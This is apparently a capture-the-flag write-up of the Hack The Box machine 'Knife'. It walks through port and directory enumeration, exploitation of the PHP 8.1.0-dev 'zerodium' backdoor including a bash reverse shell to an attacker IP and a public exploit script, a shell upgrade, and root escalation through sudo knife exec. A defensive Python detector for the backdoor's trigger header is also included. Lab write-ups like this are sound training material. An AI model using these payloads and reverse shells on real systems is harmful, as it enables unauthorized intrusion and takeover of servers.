
Knife

# TCP
nmap -vvv 10.10.10.242 -p- -sCV -oA knifeTCP
# UDP
nmap -vvv 10.10.10.242 -sU --top-ports 100 -oA knifeUDP

Starting with enumeration, we only find TCP 22 (SSH) and 80 (HTTP) open.

HTTP 80

http://10.10.10.242/

Now we fuzz for directories and pages.

dirsearch -u http://10.10.10.242/

We only get 403 responses.

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt:FUZZ -u http://10.10.10.242:80/FUZZ.php -ic

We only find index.php, so I tried another wordlist, all_files.txt.

For a reason I don't know, everything after index.php returns the content of index.php.

PHP 8.1.0

We can execute commands on the system through this backdoor with the following payload:

zerodium system("command");

Now we can get a reverse shell with this payload:

zerodium system("bash -c '/bin/bash -i >& /dev/tcp/10.10.16.9/8000 0>&1'");

We could also use an available exploit:

git clone https://github.com/flast101/php-8.1.0-dev-backdoor-rce.git
cd php-8.1.0-dev-backdoor-rce
python3 revshell_php_8.1.0-dev.py <target URL> <attacker IP> <attacker PORT>
python3 revshell_php_8.1.0-dev.py http://10.10.10.242/ 10.10.16.9 8000
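From the defender's side, the same backdoor is easy to spot: the trigger is a `User-Agentt` request header whose value begins with `zerodium`, and everything after that prefix is what the backdoored build evaluates as PHP, while the build itself announces `PHP/8.1.0-dev` in `X-Powered-By`. The following checker is an added example, not code from this writeup or from the exploit repository above; the raw requests it scans are constructed, and it assumes you feed it full requests (from a proxy or packet capture), since a default access log does not record the extra header.

```python
"""Flag requests carrying the PHP 8.1.0-dev backdoor trigger (added example)."""

# Constructed sample requests: one benign, two carrying the trigger header
# (header names are case-insensitive, so the lower-case variant must match too).
SAMPLE_REQUESTS = [
    "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agent: Mozilla/5.0\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: 10.10.10.242\r\nUser-Agentt: zerodiumsystem('id');\r\n\r\n",
    "GET /index.php HTTP/1.1\r\nHost: 10.10.10.242\r\nuser-agentt: zerodiumphpinfo();\r\n\r\n",
]

TRIGGER_HEADER = "user-agentt"
TRIGGER_PREFIX = "zerodium"


def parse_headers(raw_request: str) -> dict:
    """Map lower-cased header names to values for one raw HTTP request."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def backdoor_trigger(raw_request: str):
    """Return the PHP a backdoored server would evaluate, or None if no trigger."""
    value = parse_headers(raw_request).get(TRIGGER_HEADER)
    if value is None or not value.startswith(TRIGGER_PREFIX):
        return None
    return value[len(TRIGGER_PREFIX):]


def flag_requests(requests):
    """Return (index, evaluated_php) for every request carrying the trigger."""
    hits = []
    for index, raw_request in enumerate(requests):
        payload = backdoor_trigger(raw_request)
        if payload is not None:
            hits.append((index, payload))
    return hits


def is_backdoored_build(response_headers: dict) -> bool:
    """True when a response advertises the known-backdoored development build."""
    lowered = {k.lower(): v for k, v in response_headers.items()}
    return "PHP/8.1.0-dev" in lowered.get("x-powered-by", "")


if __name__ == "__main__":
    for index, payload in flag_requests(SAMPLE_REQUESTS):
        print(f"request {index}: backdoor trigger, would eval: {payload}")
```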

Upgrade Your Shell

python3 -c 'import pty;pty.spawn("/bin/bash")'
ctrl + z
stty raw -echo;fg

Privilege Escalation

We get the user flag, and we can run knife with sudo permissions.

sudo /usr/bin/knife exec -E 'exec "/bin/sh"'
